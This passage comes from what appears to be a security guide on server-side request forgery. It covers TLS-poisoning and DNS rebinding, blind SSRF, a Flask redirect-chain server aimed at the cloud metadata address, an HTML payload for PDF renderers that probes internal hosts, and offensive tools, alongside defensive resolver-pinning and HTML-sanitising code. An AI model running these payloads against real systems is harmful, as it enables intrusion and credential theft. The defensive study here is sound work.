  5. In the DNS request a private IP address is given now (127.0.0.1 for example)
  6. The user/bot will try to reestablish the TLS connection and in order to do so it will send the Session ID/Ticket ID (where the payload of the attacker was contained). So congratulations, you managed to ask the user/bot to attack himself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
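Both rebinding attacks in this section depend on the victim resolving the attacker's name twice: once when the destination is checked (or the first connection made) and again, with a TTL of 0, when it reconnects and gets a private address back. The following added example (Python, not TLS-poison's or Singularity's code) closes that window on the fetcher side: the hostname is resolved exactly once, every returned address is checked against loopback, RFC1918, link-local (which covers 169.254.169.254), carrier-grade NAT and IPv4-mapped IPv6 forms, and the socket is then opened to that pinned IP while the Host header and TLS SNI still carry the original name. The `resolver` argument is injectable; `make_rebinding_resolver` is a constructed stand-in that answers a public address first and 127.0.0.1 afterwards, and `attacker.example` is a placeholder name.

```python
"""Resolve once, check the answer, connect to the pinned IP.

Added example (not the page's tools). The resolver is injectable so the check
runs offline against constructed answers.
"""
import ipaddress
import socket
import ssl
import http.client
from urllib.parse import urlsplit

# Ranges ipaddress.is_private does not flag but an outbound fetcher should not reach
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]   # carrier-grade NAT, common inside clouds


class SsrfBlocked(Exception):
    pass


def is_forbidden_ip(ip_text):
    """True for loopback, private, link-local, multicast, reserved, unspecified and CGNAT addresses."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                       # ::ffff:127.0.0.1 is still loopback
    if (addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_multicast
            or addr.is_reserved or addr.is_unspecified):
        return True
    return any(addr in net for net in EXTRA_BLOCKED)


def resolve_and_pin(url, resolver=socket.getaddrinfo):
    """Resolve the URL's host exactly once; return (parts, host, port, pinned_ip) or raise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise SsrfBlocked(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if not host:
        raise SsrfBlocked("missing host")
    try:
        infos = resolver(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror as exc:
        raise SsrfBlocked(f"cannot resolve {host!r}: {exc}")
    ips = sorted({info[4][0] for info in infos})
    if not ips:
        raise SsrfBlocked(f"no addresses for {host!r}")
    forbidden = [ip for ip in ips if is_forbidden_ip(ip)]
    if forbidden:
        # reject the whole name if ANY answer is internal: a mixed answer is a rotation trick
        raise SsrfBlocked(f"{host!r} resolves to forbidden address(es) {forbidden}")
    return parts, host, port, ips[0]


def pinned_connection(url, resolver=socket.getaddrinfo, timeout=5.0):
    """Open an http.client connection to the pinned IP while keeping the hostname for Host/SNI."""
    parts, host, port, ip = resolve_and_pin(url, resolver)
    sock = socket.create_connection((ip, port), timeout=timeout)   # no second DNS lookup here
    if parts.scheme == "https":
        ctx = ssl.create_default_context()
        sock = ctx.wrap_socket(sock, server_hostname=host)        # certificate checked against the name
        conn = http.client.HTTPSConnection(host, port, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.sock = sock          # http.client only calls connect() when sock is None
    return conn               # caller: conn.request("GET", parts.path or "/"); conn.getresponse()


def check_target(url, resolver=socket.getaddrinfo):
    """('ok', pinned_ip) or ('blocked', reason); convenient for logging the decision."""
    try:
        return ("ok", resolve_and_pin(url, resolver)[3])
    except SsrfBlocked as exc:
        return ("blocked", str(exc))


def make_rebinding_resolver(first, then):
    """Constructed resolver: answers `first` on the first lookup and `then` afterwards (TTL-0 style)."""
    calls = []

    def resolver(host, port, type=socket.SOCK_STREAM):
        calls.append(host)
        ip = first if len(calls) == 1 else then
        family = socket.AF_INET6 if ":" in ip else socket.AF_INET
        return [(family, socket.SOCK_STREAM, socket.IPPROTO_TCP, "", (ip, port))]

    resolver.calls = calls
    return resolver


if __name__ == "__main__":
    r = make_rebinding_resolver("93.184.216.34", "127.0.0.1")
    print(check_target("https://attacker.example/poll", r))          # pinned to the first answer
    print("second lookup would give:", r("attacker.example", 443)[0][4][0])
    print(check_target("http://attacker.example:11211/", make_rebinding_resolver("127.0.0.1", "127.0.0.1")))
```

Note what this does and does not cover: it stops the check-then-connect race for the fetcher's own requests, but the TLS session ticket variant above targets a client that reconnects on its own, so the same rule (connect to the address you validated, not to a name) has to be applied wherever that reconnection logic lives.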

Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response of the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.

Time based SSRF

By checking the response times from the server it might be possible to know whether a resource exists or not (maybe it takes more time to access an existing resource than a non-existent one).

From blind to full abusing status codes

According to this blog post, some blind SSRFs may occur because even if the target URL responds with a 200 status code (like AWS metadata), the data isn't well formatted and therefore the app may refuse to show it.

However, it was discovered that sending some redirect responses from 305 to 309 in the SSRF could make the application follow these redirects while entering an error mode that no longer checks the data format and just shows it.

The python server used to exploit this is the following:

from flask import Flask, redirect, request

app = Flask(__name__)
# Final hop target. The page names the host but not the path, so the path is a placeholder.
METADATA_URL = "http://169.254.169.254/PLACEHOLDER-metadata-path"


@app.route("/redir")
def redir():
    count = int(request.args.get("count", 0)) + 1
    # Pump out 305, 306, 307, 308, 309, 310 ...: with count starting at 1 the
    # status climbs by one on every hop (302, 303, ..., 310)
    weird_status = 301 + count
    if count >= 10:                      # after the "weird" codes, hand out a normal 302 to the target
        return redirect(METADATA_URL, 302)
    return redirect(f"/redir?count={count}", weird_status)


@app.route("/start")
def start():
    return redirect("/redir", 302)


if __name__ == "__main__":
    app.run(host="0.0.0.0")

Steps:

  • The first 302 makes the app start following.
  • Then it receives 305 → 306 → 307 → 308 → 309 → 310.
  • After the fifth weird code the PoC finally returns 302 → 169.254.169.254 → 200 OK.

What is going on inside the target:

  • libcurl itself follows 305–310; it just treats unknown codes as "follow."
  • After N weird redirects (≥ 5 here) the application's own wrapper decides "something is off" and switches to an error mode intended for debugging.
  • In that mode it dumps the whole redirect chain plus the final body back to the external caller.
  • Result: the attacker sees every header + the metadata JSON, goal achieved.

Note that this is interesting to leak status codes that you couldn't leak before (like 200). However, if you could somehow also choose the status code of the response (imagine that you could make AWS metadata return a 500 status code), there might be some status codes that directly leak the content of the response.

HTML-to-PDF renderers as blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>
  • TCPDF 6.10.0 issues multiple download attempts per <img> resource, so a single payload can generate many requests (helpful for timing-based port scans).
  • html2pdf mirrors TCPDF's behaviour for <img> and adds CSS downloading inside Css::extractStyle(), which simply calls file_get_contents($href) after a minimal scheme check. Abuse this to reach loopback services, RFC1918 ranges, or cloud metadata endpoints.
  • Combine this SSRF primitive with HTML-to-PDF path traversal tricks to leak internal HTTP responses and local files rendered into the PDF.

Hardening should strip external URLs before rendering or confine the renderer inside a network sandbox; until then, treat PDF generators as blind SSRF proxies.
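The "strip external URLs before rendering" advice, as an added example (Python, not TCPDF's or html2pdf's code): an HTML rewriter built on the standard library's HTMLParser that walks every `src`, `href`, `poster`, `background`, `data`, `srcset` and `xlink:href` attribute and keeps it only when it is an https URL on an allowlisted host. Everything else is dropped, including loopback/RFC1918/metadata addresses, file:// URLs, relative and protocol-relative (`//host/...`) references, and `<style>` elements are removed whole because CSS `url()` and `@import` can also name remote resources. The sample document is the probe shown above plus one legitimate image; `assets.example.com` is an assumed allowlisted host. The list of removed references is returned so it can be logged, which is also a cheap detection signal for this class of probe.

```python
"""Strip remote resource references from HTML before a PDF renderer sees it.

Added example (not TCPDF's or html2pdf's code). Allowlist host and sample
document are constructed.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href", "poster", "background", "data", "srcset", "xlink:href"}


class RemoteResourceStripper(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=False)   # pass entities through untouched
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.out = []
        self.removed = []          # (tag, attr, value) for logging / alerting
        self._in_style = False

    def _permitted(self, value):
        # Only absolute https URLs on the allowlist survive; relative, protocol-relative,
        # file://, http:// and srcset lists (which do not parse as one URL) are all rejected.
        parts = urlsplit(value.strip())
        return parts.scheme == "https" and (parts.hostname or "").lower() in self.allowed_hosts

    def _render(self, tag, attrs, self_closing):
        pieces = [tag]
        for name, value in attrs:
            if name.lower() in URL_ATTRS and (value is None or not self._permitted(value)):
                self.removed.append((tag, name, value))
                continue
            pieces.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        return "<" + " ".join(pieces) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
            self.removed.append((tag, None, None))
            return
        self.out.append(self._render(tag, attrs, False))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._render(tag, attrs, True))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._in_style:           # CSS text inside <style> is dropped with the element
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass                             # comments are dropped


def strip_remote_resources(html_text, allowed_hosts):
    """Return (sanitised_html, removed_references)."""
    parser = RemoteResourceStripper(allowed_hosts)
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample: the probe from this page plus one legitimate image and some text.
SAMPLE = """<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
<img src="https://assets.example.com/logo.png" alt="logo">
<p>Invoice &amp; receipt</p>
</body>
</html>"""

if __name__ == "__main__":
    cleaned, removed = strip_remote_resources(SAMPLE, {"assets.example.com"})
    print(cleaned)
    for tag, attr, value in removed:
        print(f"removed {tag} {attr}={value!r}")
```

Run this on the submitted HTML and pass only the sanitised output to the renderer; a non-empty `removed` list on documents that should never reference external resources is worth an alert, since it is exactly what the blind probes above look like on the way in.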

Cloud SSRF Exploitation

If you find an SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

Cloud SSRF

SSRF Vulnerable Platforms

Several known platforms contain or have contained SSRF vulnerabilities; check them in:

SSRF Vulnerable Platforms

Tools

SSRFMap

Tool to detect and exploit SSRF vulnerabilities

Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for most common Java RMI vulnerabilities. Most of the available operations support the --ssrf option, to generate an SSRF payload for the requested operation. Together with the --gopher option, ready-to-use gopher payloads can be generated directly.

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack
